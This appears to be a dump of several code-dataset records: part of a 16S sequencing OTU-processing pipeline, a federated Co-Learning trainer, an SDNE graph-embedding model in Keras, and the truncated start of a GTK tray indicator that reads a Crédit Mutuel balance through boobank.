Can optimize this eventually\n # to split according to the number of cpus.\n rawfilesize = os.path.getsize(raw_data_file)\n\n # Step 1.1 - split file into 1000000 line (~100Mb) chunks\n if(rawfilesize < 2e8):\n os.system('split -l 100000 ' + raw_data_file)\n else:\n os.system('split -l 1000000 ' + raw_data_file)\n\n # Step 1.2 - get split filenames\n split_filenames = []\n for c1 in ascii_lowercase:\n for c2 in ascii_lowercase:\n filename = 'x'+c1+c2\n if(os.path.isfile(filename)):\n split_filenames.append(filename)\n if len(split_filenames) == 0:\n split_filenames = [raw_data_file]\n raw_filenames = split_filenames\n\nelse:\n \n # If multiple raw sequence files are provided in a separate summary file, check integrity of the summary file and then extract raw file names.\n print('Reading fastqs from ' + raw_data_summary_file)\n with open(raw_data_summary_file, 'r') as fid:\n all_lines = fid.readlines()\n \n # Check for contents\n if len(all_lines) == 0:\n raise NameError(\"Raw data summary file named '\" + raw_data_summary_file + \"' appears to be empty. Check its contents.\")\n # Check for tab delimitation and empty space characters\n for line in all_lines:\n if len(line.split(' ')) > 1:\n raise NameError(\"Empty space characters detected in raw data summary file '\" + raw_data_summary_file + \"'. Please make tab-delimited.\")\n if len(line.split('\\t')) == 1:\n if len(line.rstrip('\\n')) > 0:\n raise NameError(\"No tab characters found in raw data summary file '\" + raw_data_summary_file + \"'. Please make tab-delimited.\")\n else:\n raise NameError(\"Empty lines found in raw data summary file '\" + raw_data_summary_file + \"'. Please remove these before proceeding.\")\n\n raw_filenames_orig = [os.path.join(options.input_dir, line.split('\\t')[0]) for line in all_lines if len(line.rstrip('\\n')) > 0]\n sampleID_map = [line.split('\\t')[1].rstrip('\\n') for line in all_lines if len(line.strip('\\n')) > 0]\n raw_filenames = [line.split('\\t')[0] for line in all_lines if len(line.rstrip('\\n')) > 0]\n for i in range(len(raw_filenames_orig)):\n cmd_str = 'cp ' + raw_filenames_orig[i] + ' ' + raw_filenames[i]\n os.system(cmd_str)\n split_filenames = raw_filenames\n\n\n# Do quality control steps (generate read length histograms etc.)\nQCpath = os.path.join(working_directory, 'quality_control')\ntry:\n os.system('mkdir ' + QCpath)\nexcept:\n print(\"Unable to create quality control directory. Already exists?\")\nQC.read_length_histogram(split_filenames[0], QCpath, raw_file_type)\n \n\n# Check whether samples need to be split by barcodes and primers need to be removed\nif (options.split_by_barcodes == 'True' and options.primers_removed == 'True' and options.multiple_raw_files == 'False'):\n # Copy the raw file into processed folder and call it trimmed by primers\n for split_filename in split_filenames:\n cmd_str = 'cp ' + split_filename + ' ' + split_filename + '.sb.pt'\n os.system(cmd_str)\n \n# Step 2 - loop through these split files and launch parallel threads as a function of the number of CPUs\ncpu_count = mp.cpu_count()\n\n# Step 2.1 - demultiplex, i.e. 
sort by barcode\nif (options.split_by_barcodes == 'False' and options.multiple_raw_files == 'False'):\n mode = summary_obj.attribute_value_16S['BARCODES_MODE']\n pool = mp.Pool(cpu_count)\n filenames = split_filenames\n newfilenames = [f + '.sb' for f in filenames]\n barcodes_map_vect = [barcodes_map]*len(filenames)\n mode_vect = [mode]*len(filenames)\n pool.map(OTU.split_by_barcodes, zip(filenames, newfilenames, barcodes_map_vect, mode_vect))\n pool.close()\n pool.join()\n split_filenames = [f + '.sb' for f in split_filenames] \nelif (options.multiple_raw_files == 'True'):\n # If multiple raw files each corresponding to a sample are provided, rename sequence IDs according to the raw file summary sample IDs provided\n pool = mp.Pool(cpu_count)\n filenames = split_filenames\n newfilenames = [f + '.sb' for f in filenames]\n pool.map(OTU.replace_seqIDs_for_demultiplexed_files, zip(filenames, newfilenames, sampleID_map))\n pool.close()\n pool.join()\n split_filenames = [f + '.sb' for f in split_filenames]\n\n# Step 2.2 - remove primers\nif (options.primers_removed == 'False'):\n pool = mp.Pool(cpu_count)\n filenames = split_filenames\n newfilenames = [f + '.pt' for f in filenames]\n primers_vect = [primers_file]*len(filenames)\n pool.map(OTU.remove_primers, zip(filenames, newfilenames, primers_vect))\n pool.close()\n pool.join()\n split_filenames = [f + '.pt' for f in split_filenames] \n\n\n# Step 2.3 - trim with quality filter\nif (raw_file_type == \"FASTQ\"):\n pool = mp.Pool(cpu_count)\n filenames = split_filenames\n newfilenames = [f + '.qt' for f in filenames]\n ascii_vect = [ascii_encoding]*len(filenames)\n\n pool.map(OTU.trim_quality, zip(filenames, newfilenames, ascii_vect))\n pool.close()\n pool.join()\n split_filenames = [f + '.qt' for f in split_filenames] \n\n\n# Step 2.4 - trim to uniform length of 101\ntry: \n length = summary_obj.attribute_value_16S['TRIM_LENGTH']\nexcept:\n length = 101\npool = mp.Pool(cpu_count)\nfilenames = split_filenames\nnewfilenames = [f + '.lt' for f in filenames]\nlength_vect = [length]*len(filenames)\nascii_vect = [ascii_encoding]*len(filenames)\n \nif (raw_file_type == \"FASTQ\"):\n pool.map(OTU.trim_length_fastq, zip(filenames, newfilenames, length_vect, ascii_vect))\n pool.close()\n pool.join()\n split_filenames = [f + '.lt' for f in split_filenames] \nelse:\n pool.map(OTU.trim_length_fasta, zip(filenames, newfilenames, length_vect))\n pool.close()\n pool.join()\n split_filenames = [f + '.lt' for f in split_filenames] \n\n# Step 2.5 - convert to FASTA format\nif (raw_file_type == \"FASTQ\"):\n pool = mp.Pool(cpu_count)\n filenames = split_filenames\n newfilenames = [f + '.fasta' for f in filenames]\n pool.map(frmt.fastq2fasta, zip(filenames, newfilenames))\n pool.close()\n pool.join()\n split_filenames = [f + '.fasta' for f in split_filenames] \n\n# Step 2.6 - renumber sequences IDs to be consistent across files\ntry:\n separator = summary_obj.attribute_value_16S['BARCODES_SEPARATOR']\nexcept:\n separator = '_'\nOTU.renumber_sequences(split_filenames, separator)\n\n\n# Step 3 - Recombine into a single fasta file\nif len(split_filenames)>1:\n cat_str = ['cat']\n for filename in split_filenames:\n cat_str.append(filename)\n cat_str = ' '.join(cat_str)\n cat_str = cat_str + ' > ' + fasta_trimmed \n # Recombine\n os.system(cat_str)\nelse:\n os.system('cp ' + split_filenames[0] + ' ' + fasta_trimmed)\n\n\n# Dereplicate sequences into a list of uniques for clustering\nOTU.dereplicate_and_sort(fasta_trimmed, fasta_dereplicated, dereplication_map, '_')\n\n# 
Remove chimeras and cluster OTUs\nOTU.remove_chimeras_and_cluster_OTUs(fasta_dereplicated, OTU_sequences_fasta, OTU_sequences_table, OTU_clustering_results, relabel=True, cluster_percentage=similarity)\n\n\n############################\n#\n# OTU and oligotype calling\n#\n############################\n\n# Build de novo oligotype table - annotate sequences as 'OTU_ID.oligotype_ID' and compute counts for each oligotype\nOTU.compute_oligotype_table(fasta_trimmed, fasta_dereplicated, OTU_clustering_results, '_', oligotype_table_filename)\n\n\n# Obtain Greengenes reference IDs for dereplicated sequences\nalignment_results = working_directory + '/gg_alignments.aln'\nuc_results = working_directory + '/gg_alignments.uc'\nsimilarity_float = float(similarity)/100\nGG_database_to_use = '/home/ubuntu/gg_13_5_otus/rep_set/' + str(int(similarity)) + '_otus.fasta'\nif not os.path.isfile(GG_database_to_use):\n raise NameError('Percent similarity ID (' + str(similarity) + '%) does not have a matching GG database. This will break downstream steps.')\ncmd_str = '/home/ubuntu/bin/usearch8 -usearch_local ' + fasta_dereplicated + ' -db ' + GG_database_to_use + ' -strand both -id ' + str(similarity_float) + ' -alnout ' + alignment_results + ' -uc ' + uc_results\nos.system(cmd_str)\n\n# Extract alignment dictionary\nOTU_GG_dict = OTU.parse_alignment(alignment_results)\n\n# Separate out GG-referenced reads from the rest which will be clustered as de novo OTUs\nGG_reads_fasta = os.path.join(working_directory, 'gg_reads.fasta')\ndenovo_reads_fasta = os.path.join(working_directory, 'denovo_reads.fasta')\nOTU.separate_GG_reads(fasta_dereplicated, OTU_GG_dict, GG_reads_fasta, denovo_reads_fasta)\n\n# Cluster remaining reads\ndenovo_OTU_sequences = os.path.join(working_directory, dataset_ID + '.denovo_otus.fasta')\ndenovo_OTU_seqs_table = os.path.join(working_directory, dataset_ID + '.denovo_otus.table')\ndenovo_clustering_results = os.path.join(working_directory, dataset_ID + '.denovo_clustering.tab')\nif os.path.isfile(denovo_reads_fasta):\n OTU.remove_chimeras_and_cluster_OTUs(denovo_reads_fasta, denovo_OTU_sequences, denovo_OTU_seqs_table, denovo_clustering_results, relabel=True, cluster_percentage=similarity)\n\n # Recompute a de novo oligotype table for de novo reads\n denovo_oligotype_table = os.path.join(working_directory, dataset_ID + '.denovo_oligotype_table.classic')\n denovo_only_otu_table = os.path.join(working_directory, dataset_ID + '.denovo_only_otu_table.classic')\n OTU.compute_oligotype_table(fasta_trimmed, denovo_reads_fasta, denovo_clustering_results, '_', denovo_oligotype_table)\n OTU.collapse_oligotypes(denovo_oligotype_table, denovo_only_otu_table)\n\n# Build 3 OTU tables - one completely de novo (equivalent to collapsed oligotype table)\n# - one only with OTUs that matched a Greengenes sequence (for use in PiCRUST)\n# - one open reference \n\n# De novo OTU table in classic dense format\nOTU_table_classic = OTU_table + '.classic'\nOTU.collapse_oligotypes(oligotype_table_filename, OTU_table_classic)\n\n# Closed reference OTU table (GreenGenes-referenced)\nOTU_table_gg = OTU_table + '.gg'\nOTU.build_GG_OTU_table(dereplication_map, OTU_GG_dict, OTU_table_gg)\n\n# Convert GG OTU to classic format\nOTU_table_gg_classic = OTU_table_gg + '.classic'\nfrmt.convert_OTU_to_classic_dense_format(OTU_table_gg, OTU_table_gg_classic)\n\n# Concatenate GG table and denovo table\nif os.path.isfile(denovo_reads_fasta):\n open_reference_OTU_table = OTU_table + '.open_ref.classic'\n 
OTU.concatenate_OTU_tables(OTU_table_gg_classic, denovo_only_otu_table, open_reference_OTU_table)\n\n\n# Convert OTU counts to relative abundances. These will become the default OTU tables.\nOTU_table_classic_relative_abundances = OTU_table + '.classic.relative'\nOTU_table_gg_classic_relative_abundances = OTU_table_gg + '.classic.relative'\nfrmt.convert_to_relative_abundances(OTU_table_classic, OTU_table_classic_relative_abundances)\nfrmt.convert_to_relative_abundances(OTU_table_gg_classic, OTU_table_gg_classic_relative_abundances)\n\n\n##################\n#\n# Basic quality control\n#\n###################\n\n# Print barplot of readcounts per sample\nQC.sample_read_counts(OTU_table_classic, QCpath)\n\n# Write out number of reads thrown out at each step\nQC.reads_thrown_out_at_each_step(raw_filenames, os.path.join(QCpath, 'processing_summary.txt'))\n\n\n#################################################\n#\n# Put all results and metadata file in a single folder\n#\n#################################################\n\ndataset_folder = dataset_ID + '_results'\ntry:\n os.system('mkdir ' + dataset_folder)\nexcept:\n print('Results directory already exists. Overwriting its contents.')\n\nos.system('cp -r ' + QCpath + ' ' + dataset_folder + '/.')\n\n# Open ref, closed ref, fully de novo and oligotype tables\ntry:\n os.system('cp ' + open_reference_OTU_table + ' ' + dataset_folder + '/.')\n os.system('cp ' + denovo_only_otu_table + ' ' + dataset_folder + '/.')\nexcept:\n pass\nos.system('cp ' + OTU_table_gg_classic + ' ' + dataset_folder + '/.')\nos.system('cp ' + OTU_table_classic + ' ' + dataset_folder + '/.')\nos.system('cp ' + oligotype_table_filename + ' ' + dataset_folder + '/.')\nos.system('cp ' + OTU_table_gg_classic_relative_abundances + ' ' + dataset_folder + '/.')\nos.system('cp ' + OTU_table_classic_relative_abundances + ' ' + dataset_folder + '/.')\n\n# OTU sequences\nos.system('cp ' + OTU_sequences_table + ' ' + dataset_folder + '/.')\nos.system('cp ' + OTU_sequences_fasta + ' ' + dataset_folder + '/.')\n\nif metadata_file is not None:\n os.system('cp ' + options.input_dir + '/' + metadata_file + ' ' + dataset_folder + '/.')\n\n# Put the summary file in the folder and change the summary file path to its new location\nos.system('cp ' + summary_file + ' ' + dataset_folder + '/.')\nsummary_obj.summary_file = dataset_folder + '/summary_file.txt'\nsummary_obj.attribute_value_16S['OTU_TABLE_CLOSED_REF'] = ntpath.basename(OTU_table_gg)\nsummary_obj.attribute_value_16S['OTU_TABLE_DENOVO'] = ntpath.basename(OTU_table_classic)\nsummary_obj.attribute_value_16S['OLIGOTYPE_TABLE'] = ntpath.basename(oligotype_table_filename)\nsummary_obj.attribute_value_16S['OTU_SEQUENCES_TABLE'] = ntpath.basename(OTU_sequences_table)\nsummary_obj.attribute_value_16S['OTU_SEQUENCES_FASTA'] = ntpath.basename(OTU_sequences_fasta)\ntry:\n summary_obj.attribute_value_16S['METADATA_FILE'] = ntpath.basename(metadata_file)\nexcept:\n summary_obj.attribute_value_16S['METADATA_FILE'] = \"None\"\nsummary_obj.attribute_value_16S['PROCESSED'] = 'True'\nsummary_obj.WriteSummaryFile()\n\n\n# Transfer results \nprocessing_results_dir = '/home/ubuntu/processing_results'\nos.system('cp -r ' + os.path.join(working_directory, dataset_folder) + ' ' + processing_results_dir + '/.')\n\n'''\n# Transfer to PiCRUST server and wait for results\ncl = CommLink('proc')\nresults_folder = dataset_ID + '_results'\ntest = cl.launch_proc_listener(dataset_folder, results_folder)\n\n# Move results from inbox to results folder\nprocessing_results_dir 
= '/home/ubuntu/processing_results'\nos.system('mv /home/ubuntu/inbox/' + results_folder + ' ' + processing_results_dir + '/.')\nos.chdir(os.path.join(processing_results_dir, results_folder))\n\n\n# Extract features\nfeatures = Features('summary_file.txt')\nfeatures.LoadOTUtable()\nfeatures.LoadPredictedMetagenome()\nmetapredL1 = os.path.join('/home/ubuntu/processing_results', results_folder, 'picrust_results/CRC_Zhao_2012.L1.biom')\nmetapredL2 = os.path.join('/home/ubuntu/processing_results', results_folder, 'picrust_results/CRC_Zhao_2012.L2.biom')\nmetapredL3 = os.path.join('/home/ubuntu/processing_results', results_folder, 'picrust_results/CRC_Zhao_2012.L3.biom')\nfeatures.LoadPredictedMetagenome(metapredL1)\nfeatures.LoadPredictedMetagenome(metapredL2)\nfeatures.LoadPredictedMetagenome(metapredL3)\nfeatures.LoadPhylogeneticFeatures()\n\n# Pickle features\nwith open('pickled_features.pkl', 'wb') as fid:\n pickle.dump(features, fid)\n\n\n###################\n#\n# Final check - implement a better check in the future\n#\n###################\n\n\n# Check for file size greater than zero - add more thorough check eventually\notu_proc_success = False\nif(os.stat(OTU_table).st_size > 0 and os.stat(OTU_sequences_fasta).st_size > 0 and os.stat(OTU_sequences_table).st_size > 0):\n otu_proc_success = True\n\n# Processing complete - if successful, update summary file and write. Otherwise, leave untouched and exit.\nif(otu_proc_success == True):\n print(\"Successfully processed 16S data! Summary file has been updated.\")\nelse:\n print(\"Failed to process 16S data.\")\n\n'''\n\n","sub_path":"scripts/nraw2otu.py","file_name":"nraw2otu.py","file_ext":"py","file_size_in_byte":21710,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"225306863","text":"from tensorflow.keras.callbacks import LearningRateScheduler\r\nimport numpy as np\r\nimport tensorflow.keras.backend as K\r\n# Local Imports\r\nfrom server import FLServer\r\nfrom client import FLClient\r\n\r\n\r\ndef choose_Et(previous_E, current_epoch, current_weights, previous_weights, epsilon=0.05):\r\n if current_epoch == 0:\r\n return previous_E\r\n prev_weight_sum = abs(np.sum(list(map(np.sum, previous_weights))))\r\n weight_diff = abs(np.sum(list(map(np.sum, [a_i - b_i for a_i, b_i in zip(current_weights, previous_weights)]))))\r\n if (weight_diff / (prev_weight_sum + K.epsilon())) <= epsilon:\r\n print('Double E in global epoch {}'.format(current_epoch))\r\n return 2 * previous_E\r\n else:\r\n return previous_E\r\n\r\n\r\nclass CoLearningClient(FLClient):\r\n def __init__(self, model, data, lr, decay_rate=0.25):\r\n super().__init__(model, data, lr)\r\n\r\n self.decay_rate = decay_rate\r\n self.lr = lr\r\n self.lr_scheduler = LearningRateScheduler(self.cyclical_lr)\r\n self.Et = None\r\n\r\n def train(self, current_epoch, current_weights, Et, B, _, verbose):\r\n self.Et = Et\r\n if B == 0:\r\n B = len(self.local_data.y_train)\r\n self.model.set_weights(current_weights)\r\n self.model.fit(self.local_data.x_train, self.local_data.y_train, batch_size=B,\r\n epochs=self.Et, shuffle=True, callbacks=[self.lr_scheduler], verbose=verbose)\r\n return self.model.get_weights()\r\n\r\n def cyclical_lr(self, epoch):\r\n # Epoch starts at 0, but has to start at 1 for Co-Learning\r\n return self.lr * np.power(self.decay_rate, (epoch+1) / self.Et)\r\n\r\n\r\nclass CoLearningServer(FLServer):\r\n def train(self, T, target_accuracy, verbose):\r\n roc = 0\r\n E = self.params['E']\r\n previous_weights = None\r\n while self.accuracy < target_accuracy and roc < T:\r\n w_t = self.model.get_weights()\r\n selected_clients = np.random.choice(list(self.clients.keys()),\r\n size=max(1, int(self.params['K']*self.params['C'])),\r\n replace=False)\r\n local_weights = []\r\n local_sizes = []\r\n if E < 100: # Threshold E to just over 100\r\n E = choose_Et(E, roc, w_t, previous_weights, self.params['epsilon'])\r\n for k in selected_clients:\r\n # Run local training\r\n current_local_weights = self.clients[k].train(roc, w_t, E, self.params['B'], None, verbose)\r\n local_weights.append(current_local_weights)\r\n local_sizes.append(self.clients[k].get_data_size())\r\n previous_weights = w_t\r\n self.aggregate_client_weights(local_weights, local_sizes)\r\n loss, accuracy, precision, recall, f1 = self.evaluate_model(verbose)\r\n self.accuracy = accuracy\r\n print('{} - Loss: {:.2f} Accuracy: {:.2f}\\n'.format(roc, loss, accuracy))\r\n roc += 1\r\n previous_weights = w_t\r\n return self.evaluate_model(verbose), roc\r\n\r\n def create_clients(self):\r\n for k in range(self.params['K']):\r\n self.clients[k] = CoLearningClient(self.model, self.dataset.get_local_data_for_client(k), self.params['lr'])\r\n","sub_path":"algorithms/colearning.py","file_name":"colearning.py","file_ext":"py","file_size_in_byte":3316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"210081978","text":"\"\"\"\nOriginal code taken from\n - https://github.com/xiaohan2012/sdne-keras/blob/master/core.py\n - https://github.com/palash1992/GEM/tree/master/gem/embedding/sdne.py\nand modified/combined in this file\n\"\"\"\nimport math\nimport keras\nimport numpy as np\nimport keras.backend as K\nimport keras.models as KM\nimport keras.layers as KL\nfrom keras.optimizers import Adam\nimport keras.regularizers as Regularizers\n\n\ndef build_reconstruction_loss(beta):\n \"\"\"\n return the loss function for 2nd order proximity\n beta: the definition below Equation 3\"\"\"\n assert beta > 1\n\n def reconstruction_loss(true_y, pred_y):\n diff = K.square(true_y - pred_y)\n\n # borrowed from https://github.com/suanrong/SDNE/blob/master/model/sdne.py#L93\n weight = true_y * (beta - 1) + 1\n\n weighted_diff = diff * weight\n return K.mean(K.sum(weighted_diff, axis=1)) # mean square error\n\n return reconstruction_loss\n\n\ndef edge_wise_loss(true_y, embedding_diff):\n \"\"\"1st order proximity\n \"\"\"\n # true_y supposed to be None\n # we don't use it\n return K.mean(K.sum(K.square(embedding_diff), axis=1)) # mean square error\n\n\ndef train_data_generator(graph, encode_dim, batch_size=32):\n n = graph.vcount()\n m = graph.ecount()\n while True:\n for i in range(int(math.ceil(m / batch_size))):\n sel = slice(i * batch_size, (i + 1) * batch_size)\n batch_neighbors_a = []\n batch_neighbors_b = []\n batch_weight = []\n\n for edge in graph.es[sel]:\n neighbors_a = graph.neighbors(graph.vs[edge.source]['name'])\n neighbors_b = graph.neighbors(graph.vs[edge.target]['name'])\n weight = edge['weight']\n neig_a = np.zeros((n,))\n neig_a[neighbors_a] = 1.0\n batch_neighbors_a.append(neig_a)\n neig_b = np.zeros((n,))\n neig_b[neighbors_b] = 1.0\n batch_neighbors_b.append(neig_b)\n batch_weight.append(weight)\n\n batch_dummy = np.zeros((len(batch_neighbors_a), encode_dim))\n yield ([np.array(batch_neighbors_a), np.array(batch_neighbors_b), np.array(batch_weight)],\n [np.array(batch_neighbors_a), np.array(batch_neighbors_b), batch_dummy])\n\n\nclass SDNE:\n def __init__(self, n, d, beta, alpha, nu1,\n nu2, k, n_units, rho, n_iter, lr):\n \"\"\"\n :param n: number of nodes in the graph\n :type n: int\n :param d: dimension of the embedding\n :type d: int\n :param beta: penalty parameter in matrix B of 2nd order objective\n :type beta: float\n :param alpha: weighing hyperparameter for 1st order objective\n :type alpha: float\n :param nu1: L1-reg hyperparameter\n :type nu1: float\n :param nu2: L2-reg hyperparameter\n :type nu2: float\n :param k: number of hidden layers in encoder/decoder\n :type k: int\n :param n_units: list of length k containing number of units in hidden layers\n of encoder/decoder\n :type n_units: list(int)\n :param rho: bounding ratio for number of units in consecutive layers (< 1)\n :type rho: float\n :param n_iter: number of epochs\n :type n_iter: int\n :param lr: learning rate for the optimizer\n :type lr: float\n \"\"\"\n self.method_name = 'sdne'\n self.activation_fn = 'relu'\n self.n = n\n self.d = d\n self.beta = beta\n self.alpha = alpha\n self.nu1 = nu1\n self.nu2 = nu2\n self.k = k\n self.n_units = n_units\n self.rho = rho\n self.n_iter = n_iter\n self.lr = lr\n self.build()\n\n def build(self):\n # one end of an edge\n input_a = KL.Input(shape=(self.n,), name='input-a', dtype='float32')\n # the other end of an edge\n input_b = KL.Input(shape=(self.n,), name='input-b', dtype='float32')\n edge_weight = KL.Input(shape=(1,), name='edge_weight', 
dtype='float32')\n\n self.encoder = get_encoder(self.n, self.d, self.k, self.n_units, self.nu1, self.nu2, self.activation_fn)\n self.decoder = get_decoder(self.n, self.d, self.k, self.n_units, self.nu1, self.nu2, self.activation_fn)\n self.autoencoder = get_autoencoder(self.encoder, self.decoder)\n\n # Process inputs\n [decoded_a, encoded_a] = self.autoencoder(input_a)\n [decoded_b, encoded_b] = self.autoencoder(input_b)\n\n embedding_diff = KL.Subtract()([encoded_a, encoded_b])\n # add weight to diff\n embedding_diff = KL.Lambda(lambda x: x * edge_weight)(embedding_diff)\n\n self.model = KM.Model(inputs=[input_a, input_b, edge_weight],\n outputs=[decoded_a, decoded_b, embedding_diff])\n\n reconstruction_loss = build_reconstruction_loss(self.beta)\n opt = Adam(lr=self.lr, amsgrad=True)\n self.model.compile(optimizer=opt,\n loss=[reconstruction_loss, reconstruction_loss, edge_wise_loss],\n loss_weights=[1, 1, self.alpha])\n\n def fit(self, train_data_file, epochs, batch_size, steps_per_epoch, log=False):\n \"\"\"kwargs: keyword arguments passed to `model.fit`\"\"\"\n if log:\n callbacks = [keras.callbacks.TensorBoard(\n log_dir='./log', histogram_freq=0,\n write_graph=True, write_images=False)]\n else:\n callbacks = []\n\n gen = train_data_generator(train_data_file, self.d, batch_size=batch_size)\n\n self.model.fit_generator(gen, epochs=epochs, shuffle=True, callbacks=callbacks,\n steps_per_epoch=steps_per_epoch, verbose=1, use_multiprocessing=False)\n\n def save_node_embeddings(self, graph, output_file):\n \"\"\" Save node embeddings of the specified nodes into the output file\n\n :param graph: graph to save node embeddings\n :type graph: igraph Graph object\n :param output_file: file to save the result\n :type output_file: str\n :return: None\n \"\"\"\n m = graph.vcount()\n with open(output_file, 'w') as f:\n f.write(f'{m} {self.d}\\n')\n for node in graph.vs:\n node_name = node['name']\n neighbors = graph.neighbors(node_name)\n input_node = np.zeros((m,))\n input_node[neighbors] = 1.0\n embedding = self.encoder.predict(np.array([input_node]))[0].tolist()\n f.write(f\"{node_name} {' '.join(map(str, embedding))}\\n\")\n\n def save(self, path):\n self.model.save_weights(path)\n\n def load(self, path):\n self.model.load_weights(path, by_name=True)\n\n\ndef get_encoder(node_num, d, k, n_units, nu1, nu2, activation_fn):\n # Input\n x = KL.Input(shape=(node_num,))\n # Encoder layers\n y = [None] * (k + 2)\n y[0] = x # y[0] is assigned the input\n for i in range(k):\n y[i + 1] = KL.Dense(n_units[i], activation=activation_fn,\n kernel_regularizer=Regularizers.l1_l2(l1=nu1, l2=nu2))(y[i])\n y[k] = KL.Dense(d, activation=activation_fn,\n kernel_regularizer=Regularizers.l1_l2(l1=nu1, l2=nu2))(y[k - 1])\n # Encoder model\n encoder = KM.Model(inputs=x, outputs=y[k], name='encoder')\n return encoder\n\n\ndef get_decoder(node_num, d, k, n_units, nu1, nu2, activation_fn):\n # Input\n y = KL.Input(shape=(d,))\n # Decoder layers\n y_hat = [None] * (k + 2)\n y_hat[k+1] = y\n for i in range(k, 0, -1):\n y_hat[i] = KL.Dense(n_units[i - 1], activation=activation_fn,\n kernel_regularizer=Regularizers.l1_l2(l1=nu1, l2=nu2))(y_hat[i + 1])\n y_hat[0] = KL.Dense(node_num, activation='sigmoid',\n kernel_regularizer=Regularizers.l1_l2(l1=nu1, l2=nu2))(y_hat[1])\n # Output\n x_hat = y_hat[0] # decoder's output is also the actual output\n # Decoder Model\n decoder = KM.Model(inputs=y, outputs=x_hat, name='decoder')\n return decoder\n\n\ndef get_autoencoder(encoder, decoder):\n # Input\n x = 
KL.Input(shape=(encoder.layers[0].input_shape[1],))\n # Generate embedding\n y = encoder(x)\n # Generate reconstruction\n x_hat = decoder(y)\n # Autoencoder Model\n autoencoder = KM.Model(inputs=x, outputs=[x_hat, y], name='autoencoder')\n return autoencoder\n","sub_path":"model/graph_embedding_methods/sdne.py","file_name":"sdne.py","file_ext":"py","file_size_in_byte":8411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"479034343","text":"#!/usr/bin/python2\n# -*- coding:Utf-8 -*-\n\n\"\"\"\nApp Indicator for Credit Mutuel (french bank) backend of boobank (weboob).\n\"\"\"\n\n# Imports ===============================================================#\n\nfrom __future__ import print_function\n\nimport sys\nimport gtk\nimport appindicator\n\nimport os\nimport commands\nimport subprocess\n\nimport webbrowser\n\nimport ConfigParser\n\n# Global variables ======================================================#\n\nICONS_PATH = os.path.dirname(os.path.realpath(__file__)) + '/icons/'\nICONS = {\n \"monochrome\":ICONS_PATH + \"cmu.png\",\n \"colored\":ICONS_PATH + \"cmu-color.png\"\n}\n\n# Classes ===============================================================#\n\nclass Configuration:\n def __init__(self,configfile=None):\n self.account_name = \"unnamed\"\n self.timeout = (60 * 10) * 1000\n self.icon_style = \"monochrome\"\n self.notifications = True\n\n self.conf_path = configfile\n\n if os.path.exists(os.path.realpath(configfile)):\n print (\"Loading {0} as configfile\".format(configfile))\n self.load(configfile)\n else:\n print (\"Writing {0} as configfile\".format(configfile))\n self.new_config_file(configfile)\n\n def load(self,configfile):\n def _str2vals(s):\n if s.lower() == \"true\":\n return True\n elif s.lower() == \"false\":\n return False\n elif s.lower() == \"none\":\n return None\n else:\n return s\n\n parser = ConfigParser.RawConfigParser()\n\n parser.read(configfile)\n\n if parser.has_option(\"update\",\"check_pause\"):\n self.timeout = int(parser.get(\"update\",\"check_pause\"))\n if parser.has_option(\"update\",\"account_name\"):\n self.account_name = parser.get(\"update\",\"account_name\")\n\n if parser.has_option(\"desktop\",\"notifications\"):\n self.notifications = _str2vals(parser.get(\"desktop\",\"notifications\"))\n if parser.has_option(\"desktop\",\"icon_style\"):\n self.icon_style = parser.get(\"desktop\",\"icon_style\")\n\n def new_config_file(self,configfile):\n def _bool2str(b):\n if b:\n return \"True\"\n else:\n return \"False\"\n\n parser = ConfigParser.RawConfigParser()\n\n parser.add_section(\"update\")\n parser.set(\"update\",\"account_name\",self.account_name)\n parser.set(\"update\",\"check_pause\",str(self.timeout))\n\n parser.add_section(\"desktop\")\n parser.set(\"desktop\",\"notifications\",_bool2str(self.notifications))\n parser.set(\"desktop\",\"icon_style\",self.icon_style)\n\n with open(configfile,\"w\") as cf:\n parser.write(cf)\n\nclass CheckCMU:\n def __init__(self,config):\n self.config = config\n self.current_account = None\n self.launched = True\n\n self.account_name = self.config.account_name\n self.notify = self.config.notifications\n\n self.ind = appindicator.Indicator(\n \"cmu-indicator\",\n \"bank-account\",\n appindicator.CATEGORY_APPLICATION_STATUS\n )\n\n if self.config.icon_style == \"monochrome\":\n self.ind.set_icon(ICONS[\"monochrome\"])\n elif self.config.icon_style == \"colored\":\n self.ind.set_icon(ICONS[\"colored\"])\n else:\n self.ind.set_icon(ICONS[\"colored\"])\n\n self.menu_setup()\n self.ind.set_menu(self.menu)\n\n def menu_setup(self):\n self.menu = gtk.Menu()\n\n self.account_item = gtk.MenuItem(\"0 € (rafraichir)\")\n self.account_item.connect(\"activate\",self.refresh_click)\n self._refresh()\n\n self.web_item = gtk.MenuItem(\"Site web Crédit Mutuel\")\n self.web_item.connect(\"activate\", self.open_web)\n\n self.conf_item = gtk.MenuItem(\"Configuration\")\n self.conf_item.connect(\"activate\", self.edit_config)\n\n 
self.quit_item = gtk.MenuItem(\"Quitter\")\n self.quit_item.connect(\"activate\", self.quit)\n\n\n for menu_item in [\n self.account_item,\n self.web_item,\n self.conf_item,\n self.quit_item]:\n\n menu_item.show()\n self.menu.append(menu_item)\n\n if self.launched:\n self.launched = False\n\n def main(self):\n if self.config.timeout:\n if self.config.timeout > 0:\n gtk.timeout_add(self.config.timeout, self._refresh)\n\n if self.launched:\n print (\"Starting CMU Indicator\")\n\n if self.notify:\n os.system(\"notify-send 'CMU Indicator' 'Chargement...'\")\n\n gtk.main()\n\n def open_web(self,widget):\n webbrowser.open(\"https://www.creditmutuel.fr\")\n\n def refresh_click(self, widget):\n self._refresh()\n\n def edit_config(self,widget):\n subprocess.Popen([\"xdg-open\",self.config.conf_path])\n\n def _refresh(self):\n def weboob(account_name):\n print (\"{0} Reloading weboob configuration {0}\".format(5*\"=\"))\n os.system(\"weboob-config update\")\n print (\"{0}================================{0}\".format(5*\"=\"))\n\n out = commands.getoutput(\n 'boobank list | grep \"{0}\"'.format(account_name)\n )\n\n if out:\n money = out.split()[-1]\n\n return money\n\n else:\n print (\"Updating: get nothing!\")\n return None\n\n print (\"Updating...\")\n\n if self.notify and not self.launched:\n os.system(\"notify-send 'CMU Indicator' 'Rafraichissement en cours...'\")\n\n ca = weboob(self.account_name)\n\n if ca is None:\n if self.current_account is None:\n self.current_account = 0\n self.account_item.set_label(\"0 € (rafraichir)\")\n else:\n self.account_item.set_label(\"{0} € (rafraichir)\".format(self.current_account))\n else:\n self.current_account = float(ca)\n\n self.account_item.set_label(\"{0} 